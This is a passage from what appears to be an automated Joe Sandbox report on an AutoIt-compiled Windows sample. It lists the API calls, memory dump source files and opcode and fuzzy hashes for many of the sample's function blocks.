                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095EA8E
                                                                        • LineTo.GDI32(00000000,?,?), ref: 0095EA9B
                                                                        • EndPath.GDI32(00000000), ref: 0095EAAB
                                                                        • StrokePath.GDI32(00000000), ref: 0095EAB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        • Opcode ID: 2f72620d96d1441ed252d961e4f239714d03b6ec81e6cd955a7b20a67a5118ee
                                                                        • Instruction ID: 1888bae64ca28338cc76a4ac23701f5043f4da365212c66231915465f423f197
                                                                        • Opcode Fuzzy Hash: 2f72620d96d1441ed252d961e4f239714d03b6ec81e6cd955a7b20a67a5118ee
                                                                        • Instruction Fuzzy Hash: C9F0E23301A259BBDB12AFA4AD0DFCE3F29AF06321F044201FE05600E183755691EBD5
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092C84A
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092C85D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0092C864
                                                                        • AttachThreadInput.USER32(00000000), ref: 0092C86B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: c6c11f1eff79867bf441ac21160507e0882ecd4f4058245d5cdc2521dec78cc6
                                                                        • Instruction ID: 9b7568c84ee96c1c4f9c9eb0a355175e29f6eebab73716ee6c1dfc562c0a7098
                                                                        • Opcode Fuzzy Hash: c6c11f1eff79867bf441ac21160507e0882ecd4f4058245d5cdc2521dec78cc6
                                                                        • Instruction Fuzzy Hash: 6DE0E57254622476DB105B61EC0DEDB7F6CEF157A1F408025B50D95450C675D5C1D7E0
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 0092B0D6
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,0092AC9D), ref: 0092B0DD
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0092AC9D), ref: 0092B0EA
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,0092AC9D), ref: 0092B0F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: bfc16379d7c2965f0d4c5ed248d9c288d3d905fd91d9d528699c0e1d6521bc24
                                                                        • Instruction ID: 52b86793fca5bb3d1f03dbaac6367872a317e2b80ca7af6643862ac5bb14d3f8
                                                                        • Opcode Fuzzy Hash: bfc16379d7c2965f0d4c5ed248d9c288d3d905fd91d9d528699c0e1d6521bc24
                                                                        • Instruction Fuzzy Hash: CEE086336562219BD7201FB16C0CB573BFCEF55795F018818F345D6044DB348481D760
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 0090B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0090B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0090B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 0090B4BD
                                                                        • GetWindowDC.USER32(?,00000000), ref: 0096DE2B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0096DE38
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0096DE51
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0096DE6A
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0096DE8A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0096DE95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: cc2738535433de76f3615065bfe230ed04df993427e883769ed3de5322a7d255
                                                                        • Instruction ID: 6b65549521c86c3aa65603c7134b81c39832f533649a0c4df8ba250371b0fc2c
                                                                        • Opcode Fuzzy Hash: cc2738535433de76f3615065bfe230ed04df993427e883769ed3de5322a7d255
                                                                        • Instruction Fuzzy Hash: 6AE06D32619240AFEB212B74AC09BD83B25AF52339F04C226FA7A580E1C3724980EB11
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: abb8a432adf147fdb2b5a7a7fc5268027914928985b791686e894eed265e09bf
                                                                        • Instruction ID: 971938340bad98ab44aaf0c12dcbf11806dbf8b1faf56ea05243472dcaf9e04b
                                                                        • Opcode Fuzzy Hash: abb8a432adf147fdb2b5a7a7fc5268027914928985b791686e894eed265e09bf
                                                                        • Instruction Fuzzy Hash: 19E01AB2115204EFDB005F70C848A2D7BB4EF4C350F118805F85E87250DB789880AB40
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092B2DF
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0092B2EB
                                                                        • CloseHandle.KERNEL32(?), ref: 0092B2F4
                                                                        • CloseHandle.KERNEL32(?), ref: 0092B2FC
                                                                          • Part of subcall function 0092AB24: GetProcessHeap.KERNEL32(00000000,?,0092A848), ref: 0092AB2B
                                                                          • Part of subcall function 0092AB24: HeapFree.KERNEL32(00000000), ref: 0092AB32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: ff1cb1e7a86b6d0a14636af38a3a749a4e209942c575a960c2a735b8dab00092
                                                                        • Instruction ID: aef4c31fa16c7333c60f83b8f5a33d944242af873f9ca907224b9b91e86133dc
                                                                        • Opcode Fuzzy Hash: ff1cb1e7a86b6d0a14636af38a3a749a4e209942c575a960c2a735b8dab00092
                                                                        • Instruction Fuzzy Hash: E1E0B63B119005BBCB012BA5EC0885DFBB6FF883213108221F62981575CB32A8B1FB91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 4e3ff6e0fbfd4fb94afbb4c74b5ad641b07ee17838235a9e6793438669d7a55b
                                                                        • Instruction ID: a388fc8ba866c5716ac1b8d76c61f6c30272651a69253d889851a6beb90e8059
                                                                        • Opcode Fuzzy Hash: 4e3ff6e0fbfd4fb94afbb4c74b5ad641b07ee17838235a9e6793438669d7a55b
                                                                        • Instruction Fuzzy Hash: 13E046B2515200EFDB005F70C84CA2DBBB8FF4C350F118809F95E8B250CB79A880AB40
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0092DEAA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        • Opcode ID: 3a4822e8e6049a01c32580dc2cce5f0e74b2adeb7272d840ef41bed1914d118b
                                                                        • Instruction ID: 9df1881ddff6d8ea5f5e83138d48ee66e5cb200c572fa8b828b2a291ab48b846
                                                                        • Opcode Fuzzy Hash: 3a4822e8e6049a01c32580dc2cce5f0e74b2adeb7272d840ef41bed1914d118b
                                                                        • Instruction Fuzzy Hash: 6D914770601711AFDB24CF64D884B6AB7F9BF89710F20886DF94ACB695DB70E941CB60
                                                                        APIs
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • __wcsnicmp.LIBCMT ref: 0093DEFD
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0093DFC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        • Opcode ID: 8e88168e481d06309880e6e964cf29bd968214eead770d9939a87b941d9c28d3
                                                                        • Instruction ID: 0d125a04839234d4b76870dc773f5e3366b709ce42bbc05bad68db0926969069
                                                                        • Opcode Fuzzy Hash: 8e88168e481d06309880e6e964cf29bd968214eead770d9939a87b941d9c28d3
                                                                        • Instruction Fuzzy Hash: BC617C75A04219AFCB18DF98C891EAEB7B9FF48710F014069F546AB391DB74AE40CF91
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 0090BCDA
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0090BCF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 493b0cd84c1d3e1ad670c1bbe8867fb2d9b62d1f293524b73674d81e6dd8086e
                                                                        • Instruction ID: 2419fdb60b712e01b25cc880d52c8016814685f27692a90a1c81d98c41b93ae2
                                                                        • Opcode Fuzzy Hash: 493b0cd84c1d3e1ad670c1bbe8867fb2d9b62d1f293524b73674d81e6dd8086e
                                                                        • Instruction Fuzzy Hash: 8D5133724187449BE320AF14DC8ABAFBBE8FFD5354F41484EF1C8410A2EB7085AC8792
                                                                        APIs
                                                                          • Part of subcall function 008F44ED: __fread_nolock.LIBCMT ref: 008F450B
                                                                        • _wcscmp.LIBCMT ref: 0093C65D
                                                                        • _wcscmp.LIBCMT ref: 0093C670
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        • Opcode ID: 46f826ef14cf8edc51dd4ce2aa7a99d1b420848b9eeed8ea7036920685ab9618
                                                                        • Instruction ID: ab6a29c53c2090f843e5c86de1426ca608a8ae4cb08c5e956a2a56e9837a252c
                                                                        • Opcode Fuzzy Hash: 46f826ef14cf8edc51dd4ce2aa7a99d1b420848b9eeed8ea7036920685ab9618
                                                                        • Instruction Fuzzy Hash: 3C41D572A0020ABBDF20ABB4DC42FEF77B9EF89714F00546AF605FB181D6719A448B51
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0095A85A
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0095A86F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: e016a2139a55d386669740b9f994e3347ba3bc35fd91b13a6604da0d71cf91a1
                                                                        • Instruction ID: 67758c4192e413e611221c73e94dfb38fd116397c2097ea64919e5a6ea55f750
                                                                        • Opcode Fuzzy Hash: e016a2139a55d386669740b9f994e3347ba3bc35fd91b13a6604da0d71cf91a1
                                                                        • Instruction Fuzzy Hash: D841F774E013099FDB14CF69C980BDA7BB9FB08311F14016AEE05AB341D770A945CF95
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00945190
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009451C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        • Opcode ID: 3eb9f7a8dcdc38e2b9bfb8656a4918522268bcdc1284428cb4c0aaebd7f231f2
                                                                        • Instruction ID: a1422d2d3bcbcfa8596673c5ab0743c1f29c11d449b31831e07ff92fdd86cb9a
                                                                        • Opcode Fuzzy Hash: 3eb9f7a8dcdc38e2b9bfb8656a4918522268bcdc1284428cb4c0aaebd7f231f2
                                                                        • Instruction Fuzzy Hash: 41313971C0011DABCF01AFE4CD85EEE7FB9FF58710F000115F915A6166EA71AA56CBA1
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0095980E
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0095984A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        • Opcode ID: 15edfe942d1653a3b282dc5282b278e66d489bf3259fd9c1640103e0dcd711ea
                                                                        • Instruction ID: eb8054cb957e4c62364fbc4ac9dbe805004d92ff0f36ceb711e78766017a95a7
                                                                        • Opcode Fuzzy Hash: 15edfe942d1653a3b282dc5282b278e66d489bf3259fd9c1640103e0dcd711ea
                                                                        • Instruction Fuzzy Hash: 4E316971110604AEEB10DF69CC80BBB73BDFF99765F00861AF9A9C7190CA31AC85DB60
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009351C6
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00935201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 4daebf9972f2389736540afb826771d2c2fc4c6f3bfd38f23eb12c0373471c8f
                                                                        • Instruction ID: d5e91074796e7d77e7be5bff21a75235ef6770cea0d6c0f3fe87c6e5f70eb27c
                                                                        • Opcode Fuzzy Hash: 4daebf9972f2389736540afb826771d2c2fc4c6f3bfd38f23eb12c0373471c8f
                                                                        • Instruction Fuzzy Hash: 4531B471A00704DFEB24CF99D845BAFBBF8FF89350F164419E9A5A61A0E7709A44CF50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __snwprintf
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 2391506597-2584243854
                                                                        • Opcode ID: bee3d3f7b977b050a9e81892574b0e49d52fd9ffc3bbfd20716ed690590fecb8
                                                                        • Instruction ID: 2d418918d368561397da5e80cf2048fe8ff09e02996b3cb30ac36ebd36f7e9c5
                                                                        • Opcode Fuzzy Hash: bee3d3f7b977b050a9e81892574b0e49d52fd9ffc3bbfd20716ed690590fecb8
                                                                        • Instruction Fuzzy Hash: 75216F71600219ABCF10EF68C882FAD77B5FF86744F114469F605EB181DB70EA45CBA6
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0095945C
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00959467
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 026e9bf88e657afb0ad7cd07b4d79bd395c7331c5f8db1dabd1cb20ed7d33da3
                                                                        • Instruction ID: c86e4544768f6239ac50f5fac9807c36f25371061d1e65b49819edde1f8787dd
                                                                        • Opcode Fuzzy Hash: 026e9bf88e657afb0ad7cd07b4d79bd395c7331c5f8db1dabd1cb20ed7d33da3
                                                                        • Instruction Fuzzy Hash: F0119DB1210218AFFF25DF55DC80EBB376FEB883A5F100125FD189B2A0D6719C5697A0
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00959968
                                                                        • GetSysColor.USER32(00000012), ref: 00959982
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
